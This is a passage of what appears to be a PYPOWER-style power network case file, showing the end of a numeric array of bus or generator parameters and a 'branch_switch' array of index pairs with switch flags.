[1348, 3, 0.001220261538408671, 0.06101307692043355, 2.22, 61.69, 0.004502], [1349, 3, 0.0026962338610516797, 0.13481169305258398, 2.22, 61.69, 0.004502], [1350, 3, 5.508923860624229e-06, 0.00027544619303121145, 2.22, 61.69, 0.004502], [1352, 3, 2.147778116029473e-05, 0.0010738890580147364, 2.22, 61.69, 0.004502], [1355, 3, 0.0001074820707981226, 0.005374103539906131, 2.22, 61.69, 0.004502], [1356, 2, 0.003437842496307983, 0.17189212481539914, 0, 0, 0], [1357, 2, 0.0028610034349027917, 0.1430501717451396, 0, 0, 0], [1358, 3, 1.57431431082847e-05, 0.0007871571554142351, 2.22, 61.69, 0.004502], [1359, 2, 0.004496673943395517, 0.22483369716977586, 0, 0, 0], [1360, 3, 0.0010909105792324338, 0.054545528961621695, 2.22, 61.69, 0.004502], [1361, 2, 0.0040238936307783425, 0.20119468153891715, 0, 0, 0], [1362, 2, 0.005036121783141224, 0.2518060891570612, 0, 0, 0], [1363, 3, 2.0877178372493247e-06, 0.00010438589186246623, 2.22, 61.69, 0.004502], [1364, 3, 3.1467401576668e-06, 0.00015733700788334002, 2.22, 61.69, 0.004502], [1365, 3, 2.7905933765973552e-08, 1.3952966882986779e-06, 2.22, 61.69, 0.004502], [1366, 3, 3.7773055640742765e-05, 0.0018886527820371382, 2.22, 61.69, 0.004502], [1367, 3, 0.0023320168046084195, 0.11660084023042097, 2.22, 61.69, 0.004502], [1368, 3, 8.729083978401408e-05, 0.004364541989200704, 2.22, 61.69, 0.004502], [1369, 3, 0.0005073133310147165, 0.025365666550735824, 2.22, 61.69, 0.004502], [1370, 3, 2.185563890765493e-05, 0.0010927819453827466, 2.22, 61.69, 0.004502], [1371, 2, 0.005205462164069383, 0.26027310820346916, 0, 0, 0], [1372, 2, 0.009960915765399921, 0.49804578826999607, 0, 0, 0], [1373, 3, 0.0016445116504239339, 0.0822255825211967, 2.22, 61.69, 0.004502], [1374, 2, 0.006889508467327262, 0.3444754233663631, 0, 0, 0], [1375, 2, 0.003897629175102736, 0.1948814587551368, 0, 0, 0], [1376, 2, 0.011218109707548912, 0.5609054853774457, 0, 0, 0], [1377, 2, 0.01154821772424372, 0.5774108862121861, 0, 0, 0], [1378, 2, 0.010088553250396197, 0.5044276625198099, 0, 0, 0], [1379, 3, 5.1310566028095876e-05, 0.002565528301404794, 2.22, 61.69, 0.004502], [1380, 3, 7.724465320438908e-05, 0.003862232660219454, 2.22, 61.69, 0.004502], [1381, 3, 6.446222679588771e-05, 0.003223111339794386, 2.22, 61.69, 0.004502], [1382, 2, 0.008838822964419164, 0.4419411482209583, 0, 0, 0], [1383, 2, 0.006991449967869686, 0.34957249839348425, 0, 0, 0], [1384, 3, 0.0002972463393517766, 0.014862316967588829, 2.22, 61.69, 0.004502], [1385, 3, 7.92302201959824e-06, 0.0003961511009799121, 2.22, 61.69, 0.004502], [1386, 3, 4.2899112828393286e-05, 0.002144955641419664, 2.22, 61.69, 0.004502], [1387, 3, 0.00022240699424911273, 0.011120349712455638, 2.22, 61.69, 0.004502], [1388, 3, 5.909025672850305e-05, 0.0029545128364251525, 2.22, 61.69, 0.004502], [1389, 3, 1.3594135764164036e-05, 0.0006797067882082019, 2.22, 61.69, 0.004502], [1390, 3, 0.00023763846235409512, 0.011881923117704758, 2.22, 61.69, 0.004502], [1391, 3, 3.321367742134543e-05, 0.0016606838710672715, 2.22, 61.69, 0.004502], [1392, 3, 0.0012290826914265437, 0.06145413457132718, 2.22, 61.69, 0.004502], [1393, 3, 8.763130962106806e-05, 0.004381565481053403, 2.22, 61.69, 0.004502], [1394, 3, 6.862035771367977e-05, 0.003431017885683988, 2.22, 61.69, 0.004502], [1395, 3, 4.696755105006889e-06, 0.00023483775525034447, 2.22, 61.69, 0.004502], [1396, 3, 1.533806746502789e-06, 7.669033732513945e-05, 2.22, 61.69, 0.004502], [1397, 3, 0.0015969317375463513, 0.07984658687731756, 2.22, 61.69, 0.004502], [1398, 3, 0.00017695743260373348, 0.008847871630186674, 2.22, 61.69, 0.004502], [1399, 3, 0.0011375222056992432, 0.05687611028496216, 2.22, 61.69, 0.004502], [1400, 3, 8.258214886247176e-05, 0.004129107443123589, 2.22, 61.69, 0.004502], [1401, 2, 0.005687529053514607, 0.28437645267573036, 0, 0, 0], [1402, 3, 0.001676149990745289, 0.08380749953726446, 2.22, 61.69, 0.004502], [1403, 2, 0.006560903047553205, 0.3280451523776603, 0, 0, 0], [1404, 2, 0.00837967147539588, 0.4189835737697941, 0, 0, 0], [1405, 3, 0.0018812625008740895, 0.09406312504370447, 2.22, 61.69, 0.004502], [1406, 3, 0.0006852566793279422, 0.03426283396639711, 2.22, 61.69, 0.004502], [1407, 3, 1.3471796788943673e-05, 0.0006735898394471837, 2.22, 61.69, 0.004502], [1408, 3, 0.0022637440744736176, 0.1131872037236809, 2.22, 61.69, 0.004502], [1409, 3, 0.0006152255064195905, 0.030761275320979522, 2.22, 61.69, 0.004502], [1410, 3, 0.0019639724348368857, 0.09819862174184431, 2.22, 61.69, 0.004502], [1411, 3, 0.0021497548753342545, 0.10748774376671273, 2.22, 61.69, 0.004502], [1412, 3, 0.00027178367276821494, 0.013589183638410747, 2.22, 61.69, 0.004502], [1413, 3, 0.00024205355348617716, 0.01210267767430886, 2.22, 61.69, 0.004502], [1414, 3, 0.0010833414497888312, 0.05416707248944157, 2.22, 61.69, 0.004502], [1415, 3, 0.0003034327324456432, 0.015171636622282162, 2.22, 61.69, 0.004502], [1416, 3, 0.0003214499343670683, 0.016072496718353417, 2.22, 61.69, 0.004502], [1417, 3, 6.840109511776102e-08, 3.420054755888051e-06, 2.22, 61.69, 0.004502], [1418, 2, 0.005094415242270682, 0.25472076211353417, 0, 0, 0], [1419, 3, 0.0016351442073430857, 0.08175721036715428, 2.22, 61.69, 0.004502], [1420, 3, 6.112898623992065e-05, 0.0030564493119960325, 2.22, 61.69, 0.004502], [1421, 3, 0.00026606460702435796, 0.0133032303512179, 2.22, 61.69, 0.004502], [1422, 3, 0.00018191954988514385, 0.009095977494257192, 2.22, 61.69, 0.004502], [1423, 3, 7.337148066395097e-05, 0.003668574033197549, 2.22, 61.69, 0.004502], [1424, 2, 0.01394783725195249, 0.6973918625976245, 0, 0, 0], [1425, 3, 0.0012276237264634796, 0.061381186323173985, 2.22, 61.69, 0.004502], [1426, 2, 0.0035172353742830447, 0.17586176871415224, 0, 0, 0], [1427, 2, 0.014573525731634864, 0.7286762865817433, 0, 0, 0], [1428, 2, 0.010106425105451115, 0.5053212552725559, 0, 0, 0], [1429, 3, 0.00039878430583347444, 0.019939215291673723, 2.22, 61.69, 0.004502], [1430, 3, 9.154952568992375e-07, 4.5774762844961874e-05, 2.22, 61.69, 0.004502], [1431, 2, 0.014444875563567171, 0.7222437781783587, 0, 0, 0], [1432, 3, 0.0005787184698121918, 0.028935923490609593, 2.22, 61.69, 0.004502], [1433, 2, 0.08207564315805406, 4.103782157902703, 0, 0, 0], [1434, 2, 0.004951809751904842, 0.24759048759524208, 0, 0, 0], [1435, 2, 0.005520334862536408, 0.2760167431268204, 0, 0, 0], [1436, 2, 0.005317916113270578, 0.26589580566352894, 0, 0, 0], [1437, 2, 0.009563693416141935, 0.4781846708070968, 0, 0, 0], [1438, 2, 0.012506813320271997, 0.6253406660135998, 0, 0, 0], [1439, 2, 0.003967551446301859, 0.19837757231509293, 0, 0, 0], [1440, 3, 2.5366634608490477e-05, 0.0012683317304245237, 2.22, 61.69, 0.004502], [1441, 3, 1.0923020560921105e-05, 0.0005461510280460552, 2.22, 61.69, 0.004502], [1442, 3, 4.555157486056611e-05, 0.0022775787430283057, 2.22, 61.69, 0.004502], [1443, 2, 0.006557506818224797, 0.3278753409112398, 0, 0, 0], [1444, 3, 0.00042178604120680024, 0.02108930206034001, 2.22, 61.69, 0.004502], [1445, 3, 0.0012974477381988189, 0.06487238690994093, 2.22, 61.69, 0.004502], [1446, 2, 0.03838802228081566, 1.9194011140407832, 0, 0, 0], [1447, 2, 0.005696308888305882, 0.2848154444152941, 0, 0, 0], [1448, 3, 0.00047896583949883246, 0.023948291974941624, 2.22, 61.69, 0.004502], [1449, 2, 0.006075750962706547, 0.3037875481353274, 0, 0, 0], [1450, 2, 0.0037724056227270084, 0.18862028113635043, 0, 0, 0], [1451, 2, 0.0043416728967246255, 0.21708364483623127, 0, 0, 0], [1452, 3, 0.0015322750739690742, 0.0766137536984537, 2.22, 61.69, 0.004502], [1453, 2, 0.004134065549943135, 0.20670327749715672, 0, 0, 0], [1454, 2, 0.009875666531734596, 0.49378332658672985, 0, 0, 0], [1455, 3, 4.166284213856912e-05, 0.0020831421069284557, 2.22, 61.69, 0.004502], [1456, 2, 0.0031865889687578697, 0.15932944843789354, 0, 0, 0], [1457, 3, 0.00012749408723576006, 0.006374704361788003, 2.22, 61.69, 0.004502], [1458, 3, 1.5673534819523866e-05, 0.0007836767409761935, 2.22, 61.69, 0.004502], [1459, 3, 0.00033798517072819835, 0.01689925853640992, 2.22, 61.69, 0.004502], [1460, 2, 0.0035341123869160876, 0.1767056193458044, 0, 0, 0], [1461, 3, 0.001142843079861875, 0.05714215399309376, 2.22, 61.69, 0.004502], [1462, 3, 0.00015295973435731913, 0.007647986717865956, 2.22, 61.69, 0.004502], [1463, 3, 4.5276834778775515e-05, 0.002263841738938776, 2.22, 61.69, 0.004502], [1464, 2, 0.013612820121062158, 0.6806410060531078, 0, 0, 0], [1465, 3, 0.0003374045759652472, 0.01687022879826236, 2.22, 61.69, 0.004502], [1466, 3, 0.0003619193984034768, 0.01809596992017384, 2.22, 61.69, 0.004502], [1467, 3, 0.00013344536897072216, 0.006672268448536108, 2.22, 61.69, 0.004502], [1468, 3, 0.0015144656821575462, 0.0757232841078773, 2.22, 61.69, 0.004502], [1469, 2, 0.004138503876498319, 0.20692519382491598, 0, 0, 0], [1470, 2, 0.005027084884666319, 0.2513542442333159, 0, 0, 0], [1471, 2, 0.010132763321185349, 0.5066381660592674, 0, 0, 0], [1472, 3, 0.0007626820845032627, 0.03813410422516314, 2.22, 61.69, 0.004502], [1473, 3, 0.0005323801851315335, 0.026619009256576683, 2.22, 61.69, 0.004502], [1474, 3, 8.905977123682595e-05, 0.004452988561841298, 2.22, 61.69, 0.004502], [1475, 3, 2.4884191103347185e-05, 0.0012442095551673594, 2.22, 61.69, 0.004502], [1476, 2, 0.013447819530519814, 0.6723909765259908, 0, 0, 0], [1477, 3, 0.0007717725169969112, 0.03858862584984556, 2.22, 61.69, 0.004502], [1479, 3, 0.0002282672789248009, 0.011413363946240044, 2.22, 61.69, 0.004502], [1480, 3, 0.0007506234651559853, 0.03753117325779927, 2.22, 61.69, 0.004502], [1481, 3, 3.3833873695351113e-06, 0.00016916936847675558, 2.22, 61.69, 0.004502], [1482, 3, 0.0009968171933372315, 0.04984085966686158, 2.22, 61.69, 0.004502], [1483, 3, 0.0002291607516312977, 0.011458037581564884, 2.22, 61.69, 0.004502], [1484, 3, 1.9041073525508303e-06, 9.520536762754152e-05, 2.22, 61.69, 0.004502], [1485, 3, 3.5876538426778735e-05, 0.0017938269213389369, 2.22, 61.69, 0.004502], [1486, 3, 0.00018457774197472868, 0.009228887098736434, 2.22, 61.69, 0.004502], [1487, 3, 7.276038526853737e-05, 0.0036380192634268686, 2.22, 61.69, 0.004502], [1488, 3, 0.0001558513481977158, 0.00779256740988579, 2.22, 61.69, 0.004502], [1489, 3, 7.571817467557017e-06, 0.00037859087337785094, 2.22, 61.69, 0.004502], [1490, 2, 0.04981318633597547, 2.4906593167987734, 0, 0, 0], [1491, 2, 0.005387257187745477, 0.26936285938727383, 0, 0, 0], [1492, 2, 0.014637639488319377, 0.7318819744159688, 0, 0, 0], [1493, 2, 0.005319414988695112, 0.26597074943475557, 0, 0, 0], [1494, 2, 0.015517697237226428, 0.7758848618613216, 0, 0, 0], [1495, 2, 0.002785392580387392, 0.13926962901936962, 0, 0, 0], [1496, 3, 1.5296074353684898e-08, 7.64803717684245e-07, 2.22, 61.69, 0.004502], [1497, 2, 0.005670372667342641, 0.28351863336713207, 0, 0, 0], [1498, 2, 0.006735488235440387, 0.3367744117720194, 0, 0, 0], [1499, 3, 8.649147839921763e-05, 0.004324573919960881, 2.22, 61.69, 0.004502], [1500, 3, 9.85597782087346e-06, 0.000492798891043673, 2.22, 61.69, 0.004502], [1501, 3, 0.0005198212383651805, 0.02599106191825903, 2.22, 61.69, 0.004502], [1502, 3, 2.416494673191196e-05, 0.001208247336595598, 2.22, 61.69, 0.004502], [1503, 3, 0.0021435577229307547, 0.10717788614653774, 2.22, 61.69, 0.004502], [1504, 2, 0.01095702038652941, 0.5478510193264706, 0, 0, 0], [1505, 3, 0.0007820853541874741, 0.03910426770937371, 2.22, 61.69, 0.004502], [1506, 2, 0.001439719150773438, 0.07198595753867189, 0, 0, 0], [1507, 3, 0.0003915216480092571, 0.019576082400462852, 2.22, 61.69, 0.004502], [1508, 3, 4.154538017488063e-06, 0.00020772690087440316, 2.22, 61.69, 0.004502], [1510, 2, 0.004905762439657248, 0.24528812198286243, 0, 0, 0], [1511, 2, 0.007431868856453747, 0.3715934428226873, 0, 0, 0], [1512, 2, 0.0029203290700420864, 0.14601645350210432, 0, 0, 0], [1513, 3, 0.0009614261993849037, 0.048071309969245184, 2.22, 61.69, 0.004502], [1514, 3, 7.265113851386945e-07, 3.6325569256934724e-05, 2.22, 61.69, 0.004502], [1516, 3, 1.8340973111507537e-06, 9.170486555753769e-05, 2.22, 61.69, 0.004502], [1517, 3, 8.192048507877762e-05, 0.0040960242539388805, 2.22, 61.69, 0.004502], [1518, 3, 4.268803271333055e-05, 0.0021344016356665274, 2.22, 61.69, 0.004502], [1519, 3, 2.9627970642356104e-06, 0.00014813985321178054, 2.22, 61.69, 0.004502] ]) ppc["branch_switch"] = array([ [586, 1, 0 ], [589, 108, 0 ], [590, 108, 0 ], [593, 112, 0 ], [595, 115, 0 ], [598, 118, 0 ], [599, 119, 0 ], [601, 119, 0 ], [602, 121, 0 ], [603, 526, 0 ], [607, 127, 0 ], [608, 127, 0 ], [609, 529, 0 ], [612, 493, 0 ], [614, 130, 0 ], [616, 132, 0 ], [617, 133, 0 ], [618, 133, 0 ], [619, 134, 0 ], [624, 14, 0 ], [629, 145, 0 ], [632, 145, 0 ], [637, 148, 0 ], [638, 149, 0 ], [640, 153, 0 ], [641, 155, 0 ], [642, 533, 0 ], [643, 534, 0 ], [647, 536, 0 ], [652, 167, 0 ], [655, 170, 0 ], [661, 177, 0 ], [663, 178, 0 ], [666, 180, 0 ], [668, 183, 0 ], [670, 183, 0 ], [672, 185, 0 ], [681, 197, 0 ], [683, 200, 0 ], [687, 202, 0 ], [694, 21, 0 ], [695, 210, 0 ], [696, 211, 0 ], [697, 211, 0 ], [698, 212, 0 ], [702, 215, 0 ], [704, 217, 0 ], [705, 217, 0 ], [707, 219, 0 ], [713, 225, 0 ], [714, 225, 0 ], [716, 226, 0 ], [717, 227, 0 ], [719, 229, 0 ], [724, 238, 0 ], [730, 547, 0 ], [732, 247, 0 ], [735, 253, 0 ], [738, 258, 0 ], [741, 264, 0 ], [742, 264, 0 ], [743, 500, 0 ], [747, 273, 0 ], [748, 274, 0 ], [749, 274, 0 ], [750, 557, 0 ], [753, 28, 0 ], [758, 286, 0 ], [761, 288, 0 ], [762, 289, 0 ], [763, 560, 0 ], [765, 560, 0 ], [767, 292, 0 ], [769, 293, 0 ], [771, 297, 0 ], [772, 3, 0 ], [774, 300, 0 ], [777, 300, 0 ], [778, 300, 0 ], [781, 303, 0 ], [784, 563, 0 ], [785, 501, 0 ], [787, 308, 0 ], [788, 311, 0 ], [789, 565, 0 ], [791, 314, 0 ], [792, 316, 0 ], [795, 319, 0 ], [800, 326, 0 ], [801, 327, 0 ], [802, 327, 0 ], [805, 328, 0 ], [806, 328, 0 ], [808, 329, 0 ], [809, 329, 0 ], [811, 568, 0 ], [814, 570, 0 ], [816, 335, 0 ], [817, 571, 0 ], [821, 338, 0 ], [822, 339, 0 ], [826, 339, 0 ], [830, 345, 0 ], [835, 572, 0 ], [836, 572, 0 ], [837, 350, 0 ], [839, 350, 0 ], [841, 573, 0 ], [844, 352, 0 ], [845, 356, 0 ], [849, 574, 0 ], [850, 574, 0 ], [851, 575, 0 ], [853, 362, 0 ], [855, 363, 0 ], [856, 363, 0 ], [857, 365, 0 ], [858, 368, 0 ], [860, 371, 0 ], [865, 375, 0 ], [867, 376, 0 ], [869, 503, 0 ], [870, 503, 0 ], [872, 378, 0 ], [874, 576, 0 ], [875, 381, 0 ], [882, 388, 0 ], [883, 388, 0 ], [885, 393, 0 ], [886, 394, 0 ], [889, 397, 0 ], [890, 40, 0 ], [893, 400, 0 ], [894, 400, 0 ], [895, 580, 0 ], [896, 581, 0 ], [898, 403, 0 ], [900, 405, 0 ], [902, 405, 0 ], [903, 406, 0 ], [905, 413, 0 ], [906, 414, 0 ], [907, 583, 0 ], [909, 417, 0 ], [915, 423, 0 ], [917, 43, 0 ], [918, 424, 0 ], [920, 428, 0 ], [921, 428, 0 ], [922, 429, 0 ], [923, 432, 0 ], [925, 44, 0 ], [931, 439, 0 ], [935, 45, 0 ], [936, 445, 0 ], [937, 447, 0 ], [939, 450, 0 ], [940, 451, 0 ], [944, 458, 0 ], [950, 462, 0 ], [952, 47, 0 ], [958, 478, 0 ], [959, 478, 0 ], [960, 479, 0 ], [963, 481, 0 ], [965, 49, 0 ], [966, 49, 0 ], [967, 49, 0 ], [969, 486, 0 ], [971, 51, 0 ], [973, 506, 0 ], [976, 58, 0 ], [978, 491, 0 ], [982, 62, 0 ], [983, 62, 0 ], [984, 63, 0 ], [985, 63, 0 ], [986, 64, 0 ], [987, 65, 0 ], [988, 66, 0 ], [993, 67, 0 ], [994, 67, 0 ], [995, 509, 0 ], [997, 510, 0 ], [999, 70, 0 ], [1000, 71, 0 ], [1002, 71, 0 ], [1003, 72, 0 ], [1007, 511, 0 ], [1008, 75, 0 ], [1010, 79, 0 ], [1011, 79, 0 ], [1012, 81, 0 ], [1014, 83, 0 ], [1026, 518, 0 ], [1027, 218, 0 ], [1028, 221, 0 ], [1029, 268, 0 ], [1030, 269, 0 ], [1031, 498, 0 ], [1032, 1, 0 ], [1033, 3, 0 ], [1034, 4, 0 ], [1035, 6, 0 ], [1036, 7, 0 ], [1037, 8, 0 ], [1038, 9, 0 ], [1039, 11, 0 ], [1040, 14, 0 ], [1041, 16, 0 ], [1042, 17, 0 ], [1043, 19, 0 ], [1044, 21, 0 ], [1045, 23, 0 ], [1046, 25, 0 ], [1047, 27, 0 ], [1048, 28, 0 ], [1049, 29, 0 ], [1050, 31, 0 ], [1051, 33, 0 ], [1052, 34, 0 ], [1053, 35, 0 ], [1054, 36, 0 ], [1055, 38, 0 ], [1056, 39, 0 ], [1057, 40, 0 ], [1058, 41, 0 ], [1059, 43, 0 ], [1060, 44, 0 ], [1061, 45, 0 ], [1062, 47, 0 ], [1063, 48, 0 ], [1064, 49, 0 ], [1065, 50, 0 ], [1066, 51, 0 ], [1067, 53, 0 ], [1068, 54, 0 ], [1069, 55, 0 ], [1070, 57, 0 ], [1071, 58, 0 ], [1072, 59, 0 ], [1073, 60, 0 ], [1074, 62, 0 ], [1075, 63, 0 ], [1076, 64, 0 ], [1077, 65, 0 ], [1078, 66, 0 ], [1079, 67, 0 ], [1080, 70, 0 ], [1081, 71, 0 ], [1082, 72, 0 ], [1083, 73, 0 ], [1084, 75, 0 ], [1085, 76, 0 ], [1086, 77, 0 ], [1087, 79, 0 ], [1088, 80, 0 ], [1089, 81, 0 ], [1090, 82, 0 ], [1091, 83, 0 ], [1092, 84, 0 ], [1093, 85, 0 ], [1094, 88, 0 ], [1095, 89, 0 ], [1096, 90, 0 ], [1097, 91, 0 ], [1098, 92, 0 ], [1099, 93, 0 ], [1100, 97, 0 ], [1101, 98, 0 ], [1102, 101, 0 ], [1103, 102, 0 ], [1104, 103, 0 ], [1105, 108, 0 ], [1106, 109, 0 ], [1107, 110, 0 ], [1108, 111, 0 ], [1109, 112, 0 ], [1110, 113, 0 ], [1111, 114, 0 ], [1112, 115, 0 ], [1113, 116, 0 ], [1114, 118, 0 ], [1115, 119, 0 ], [1116, 121, 0 ], [1117, 122, 0 ], [1118, 126, 0 ], [1119, 127, 0 ], [1120, 130, 0 ], [1121, 131, 0 ], [1122, 132, 0 ], [1123, 133, 0 ], [1124, 134, 0 ], [1125, 135, 0 ], [1126, 136, 0 ], [1127, 137, 0 ], [1128, 139, 0 ], [1129, 140, 0 ], [1130, 141, 0 ], [1131, 142, 0 ], [1132, 144, 0 ], [1133, 145, 0 ], [1134, 146, 0 ], [1135, 147, 0 ], [1136, 148, 0 ], [1137, 149, 0 ], [1138, 150, 0 ], [1139, 151, 0 ], [1140, 152, 0 ], [1141, 153, 0 ], [1142, 154, 0 ], [1143, 155, 0 ], [1144, 158, 0 ], [1145, 161, 0 ], [1146, 162, 0 ], [1147, 163, 0 ], [1148, 164, 0 ], [1149, 166, 0 ], [1150, 167, 0 ], [1151, 168, 0 ], [1152, 169, 0 ], [1153, 170, 0 ], [1154, 171, 0 ], [1155, 172, 0 ], [1156, 173, 0 ], [1157, 174, 0 ], [1158, 175, 0 ], [1159, 176, 0 ], [1160, 177, 0 ], [1161, 178, 0 ], [1162, 179, 0 ], [1163, 180, 0 ], [1164, 181, 0 ], [1165, 182, 0 ], [1166, 183, 0 ], [1167, 185, 0 ], [1168, 186, 0 ], [1169, 187, 0 ], [1170, 188, 0 ], [1171, 189, 0 ], [1172, 190, 0 ], [1173, 192, 0 ], [1174, 193, 0 ], [1175, 194, 0 ], [1176, 196, 0 ], [1177, 197, 0 ], [1178, 198, 0 ], [1179, 199, 0 ], [1180, 200, 0 ], [1181, 202, 0 ], [1182, 203, 0 ], [1183, 204, 0 ], [1184, 205, 0 ], [1185, 206, 0 ], [1186, 207, 0 ], [1187, 208, 0 ], [1188, 209, 0 ], [1189, 210, 0 ], [1190, 211, 0 ], [1191, 212, 0 ], [1192, 213, 0 ], [1193, 214, 0 ], [1194, 215, 0 ], [1195, 216, 0 ], [1196, 217, 0 ], [1197, 218, 0 ], [1198, 219, 0 ], [1199, 221, 0 ], [1200, 222, 0 ], [1201, 223, 0 ], [1202, 224, 0 ], [1203, 225, 0 ], [1204, 226, 0 ], [1205, 227, 0 ], [1206, 228, 0 ], [1207, 229, 0 ], [1208, 230, 0 ], [1209, 234, 0 ], [1210, 235, 0 ], [1211, 237, 0 ], [1212, 238, 0 ], [1213, 239, 0 ], [1214, 240, 0 ], [1215, 241, 0 ], [1216, 242, 0 ], [1217, 243, 0 ], [1218, 244, 0 ], [1219, 247, 0 ], [1220, 251, 0 ], [1221, 252, 0 ], [1222, 253, 0 ], [1223, 254, 0 ], [1224, 255, 0 ], [1225, 256, 0 ], [1226, 257, 0 ], [1227, 258, 0 ], [1228, 260, 0 ], [1229, 263, 0 ], [1230, 264, 0 ], [1231, 266, 0 ], [1232, 267, 0 ], [1233, 268, 0 ], [1235, 271, 0 ], [1236, 272, 0 ], [1237, 273, 0 ], [1238, 274, 0 ], [1239, 275, 0 ], [1240, 276, 0 ], [1241, 278, 0 ], [1242, 281, 0 ], [1243, 282, 0 ], [1244, 283, 0 ], [1245, 284, 0 ], [1246, 285, 0 ], [1247, 286, 0 ], [1248, 287, 0 ], [1249, 288, 0 ], [1250, 289, 0 ], [1251, 291, 0 ], [1252, 292, 0 ], [1253, 293, 0 ], [1254, 294, 0 ], [1255, 295, 0 ], [1256, 296, 0 ], [1257, 297, 0 ], [1258, 298, 0 ], [1259, 299, 0 ], [1260, 300, 0 ], [1261, 302, 0 ], [1262, 303, 0 ], [1263, 304, 0 ], [1264, 307, 0 ], [1265, 308, 0 ], [1266, 309, 0 ], [1267, 311, 0 ], [1268, 312, 0 ], [1269, 314, 0 ], [1270, 316, 0 ], [1271, 317, 0 ], [1272, 318, 0 ], [1273, 319, 0 ], [1274, 321, 0 ], [1275, 322, 0 ], [1276, 323, 0 ], [1277, 324, 0 ], [1278, 325, 0 ], [1279, 326, 0 ], [1280, 327, 0 ], [1281, 328, 0 ], [1282, 329, 0 ], [1283, 331, 0 ], [1284, 333, 0 ], [1285, 335, 0 ], [1286, 337, 0 ], [1287, 338, 0 ], [1288, 339, 0 ], [1289, 340, 0 ], [1290, 341, 0 ], [1291, 342, 0 ], [1292, 343, 0 ], [1293, 344, 0 ], [1294, 345, 0 ], [1295, 346, 0 ], [1296, 347, 0 ], [1297, 348, 0 ], [1298, 350, 0 ], [1299, 352, 0 ], [1300, 353, 0 ], [1301, 354, 0 ], [1302, 355, 0 ], [1303, 356, 0 ], [1304, 357, 0 ], [1305, 359, 0 ], [1306, 361, 0 ], [1307, 362, 0 ], [1308, 363, 0 ], [1309, 364, 0 ], [1310, 365, 0 ], [1311, 366, 0 ], [1312, 367, 0 ], [1313, 368, 0 ], [1314, 369, 0 ], [1315, 370, 0 ], [1316, 371, 0 ], [1317, 372, 0 ], [1318, 373, 0 ], [1319, 374, 0 ], [1320, 375, 0 ], [1321, 376, 0 ], [1322, 377, 0 ], [1323, 378, 0 ], [1324, 379, 0 ], [1325, 381, 0 ], [1326, 384, 0 ], [1327, 385, 0 ], [1328, 386, 0 ], [1329, 387, 0 ], [1330, 388, 0 ], [1331, 390, 0 ], [1332, 391, 0 ], [1333, 392, 0 ], [1334, 393, 0 ], [1335, 394, 0 ], [1336, 395, 0 ], [1337, 396, 0 ], [1338, 397, 0 ], [1339, 398, 0 ], [1340, 399, 0 ], [1341, 400, 0 ], [1342, 403, 0 ], [1343, 404, 0 ], [1344, 405, 0 ], [1345, 406, 0 ], [1346, 407, 0 ], [1347, 408, 0 ], [1348, 410, 0 ], [1349, 411, 0 ], [1350, 412, 0 ], [1352, 414, 0 ], [1355, 418, 0 ], [1356, 419, 0 ], [1357, 420, 0 ], [1358, 421, 0 ], [1359, 422, 0 ], [1360, 423, 0 ], [1361, 424, 0 ], [1362, 425, 0 ], [1363, 426, 0 ], [1364, 427, 0 ], [1365, 428, 0 ], [1366, 429, 0 ], [1367, 430, 0 ], [1368, 431, 0 ], [1369, 432, 0 ], [1370, 433, 0 ], [1371, 434, 0 ], [1372, 435, 0 ], [1373, 436, 0 ], [1374, 437, 0 ], [1375, 438, 0 ], [1376, 439, 0 ], [1377, 440, 0 ], [1378, 441, 0 ], [1379, 442, 0 ], [1380, 443, 0 ], [1381, 445, 0 ], [1382, 446, 0 ], [1383, 447, 0 ], [1384, 448, 0 ], [1385, 449, 0 ], [1386, 450, 0 ], [1387, 451, 0 ], [1388, 453, 0 ], [1389, 454, 0 ], [1390, 455, 0 ], [1391, 456, 0 ], [1392, 457, 0 ], [1393, 458, 0 ], [1394, 459, 0 ], [1395, 460, 0 ], [1396, 461, 0 ], [1397, 462, 0 ], [1398, 463, 0 ], [1399, 464, 0 ], [1400, 465, 0 ], [1401, 466, 0 ], [1402, 467, 0 ], [1403, 468, 0 ], [1404, 469, 0 ], [1405, 470, 0 ], [1406, 471, 0 ], [1407, 472, 0 ], [1408, 473, 0 ], [1409, 474, 0 ], [1410, 475, 0 ], [1411, 476, 0 ], [1412, 477, 0 ], [1413, 478, 0 ], [1414, 479, 0 ], [1415, 480, 0 ], [1416, 481, 0 ], [1417, 482, 0 ], [1418, 483, 0 ], [1419, 484, 0 ], [1420, 485, 0 ], [1421, 486, 0 ], [1422, 487, 0 ], [1423, 488, 0 ], [1424, 489, 0 ], [1425, 490, 0 ], [1426, 491, 0 ], [1427, 492, 0 ], [1428, 493, 0 ], [1429, 494, 0 ], [1430, 495, 0 ], [1431, 496, 0 ], [1432, 497, 0 ], [1433, 498, 0 ], [1434, 499, 0 ], [1435, 500, 0 ], [1436, 501, 0 ], [1437, 502, 0 ], [1438, 503, 0 ], [1439, 504, 0 ], [1440, 505, 0 ], [1441, 506, 0 ], [1442, 507, 0 ], [1443, 508, 0 ], [1444, 509, 0 ], [1445, 510, 0 ], [1446, 511, 0 ], [1447, 512, 0 ], [1448, 513, 0 ], [1449, 514, 0 ], [1450, 515, 0 ], [1451, 516, 0 ], [1452, 517, 0 ], [1453, 518, 0 ], [1454, 519, 0 ], [1455, 520, 0 ], [1456, 521, 0 ], [1457, 522, 0 ], [1458, 523, 0 ], [1459, 524, 0 ], [1460, 525, 0 ], [1461, 526, 0 ], [1462, 527, 0 ], [1463, 528, 0 ], [1464, 529, 0 ], [1465, 530, 0 ], [1466, 531, 0 ], [1467, 532, 0 ], [1468, 533, 0 ], [1469, 534, 0 ], [1470, 535, 0 ], [1471, 536, 0 ], [1472, 537, 0 ], [1473, 538, 0 ], [1474, 539, 0 ], [1475, 540, 0 ], [1476, 541, 0 ], [1477, 542, 0 ], [1479, 544, 0 ], [1480, 545, 0 ], [1481, 546, 0 ], [1482, 547, 0 ], [1483, 548, 0 ], [1484, 549, 0 ], [1485, 550, 0 ], [1486, 551, 0 ], [1487, 552, 0 ], [1488, 554, 0 ], [1489, 555, 0 ], [1490, 556, 0 ], [1491, 557, 0 ], [1492, 558, 0 ], [1493, 559, 0 ], [1494, 560, 0 ], [1495, 561, 0 ], [1496, 562, 0 ], [1497, 563, 0 ], [1498, 564, 0 ], [1499, 565, 0 ], [1500, 566, 0 ], [1501, 567, 0 ], [1502, 568, 0 ], [1503, 569, 0 ], [1504, 570, 0 ], [1505, 571, 0 ], [1506, 572, 0 ], [1507, 573, 0 ], [1508, 574, 0 ], [1510, 576, 0 ], [1511, 577, 0 ], [1512, 578, 0 ], [1513, 579, 0 ], [1514, 580, 0 ], [1516, 582, 0 ], [1517, 583, 0 ], [1518, 584, 0 ], [1519, 585, 0 ], [1, 490, 0 ], [3, 4, 1 ], [491, 6, 0 ], 